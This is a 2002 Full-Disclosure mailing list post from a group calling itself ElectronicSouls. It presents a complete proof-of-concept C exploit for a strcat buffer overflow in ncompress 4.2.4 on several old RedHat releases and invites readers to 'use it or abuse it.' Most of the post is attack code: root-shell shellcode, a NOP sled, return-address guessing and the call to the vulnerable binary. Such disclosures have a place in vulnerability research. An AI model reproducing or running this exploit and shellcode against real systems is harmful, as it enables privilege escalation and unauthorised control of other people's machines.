[ElectronicSouls] - /usr/bin/compress exploit
From: es () hush com
Date: Thu, 28 Nov 2002 23:13:17 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is a proof-of-concept code demonstrating a vulnerability in /usr/bin/compress. Use it or abuse it. /* * PROOF OF CONCEPT * Information System Advancement in Penetration (ISAP) Labs * * (N)compress 4.2.4 Exploit * By: Lunar Fault [ElectronicSouls] * * Vulnerable Systems found is: RedHat 6.2, 7.0, 7.1, and 7.2 * * Discription: Simple unchecked b0f involving strcat. This * exploit was tested on RedHat 6.2, 7.0, and 7.1. This is only a * Proof of concept. /usr/bin/compress is not suid root by default. * * April 22, 2002 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define VULN "/usr/bin/compress" #define NOP 0x90909090 #define NOPLEN 500 /* Thanx to 0x90 for the shellcode :) */ /* Shellcode does a chuid(0), chgrp(0), then executes /bin/sh */ const unsigned char linux_x86_exec_hellcode[] = "\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29" "\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53" "\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned long get_sp(void) { __asm__(" mov %esp, %eax"); } void usage(char *prog) { printf("<+> (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Labs\n"); printf("<!> usage: %s [options]\n", prog); printf("\t\t-h help\n"); printf("\t\t-o <offset> Example: 100\n"); printf("\t\t-r <return> Example: 0xbfffc680\n"); printf("\t\t-s <size> Example: 1056\n"); exit(1);} int main(int argv, char *argc[]) { int i, c, ret, offset; long len; char *buffer; offset = 0; len = 1056; ret = get_sp(); ret = ret - 250; /* Subtracting 250 from sp to bring the return somewhere in the NOP */ printf("<+> (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Labs\n"); if (argv > 1) { while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) { 
switch(c) { case 'r': ret = strtoll(optarg, NULL, 0); break; case 's': len = atoi(optarg); if (len < (NOPLEN + strlen(linux_x86_exec_hellcode) + 100)) { printf("<!> Size is too small to work\n"); exit(1); } break; case 'o': offset = atoi(optarg); break; case 'h': usage(argc[0]); } } } buffer = (char *) malloc(len); ret = ret + offset; for (i=0;i<len;i+=4) *(long*) &buffer[i] = NOP; for (i=NOPLEN;i<len;i+=4) *(long*) &buffer[i] = ret; memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode)); printf("<*> Offset = %d\n", offset); printf("<*> Return = 0x%.8x\n", ret); printf("<*> Size = %d\n\n", len); execl(VULN, VULN, buffer, 0); return 0; } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "The end is now." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX 0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ== =ABKy -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html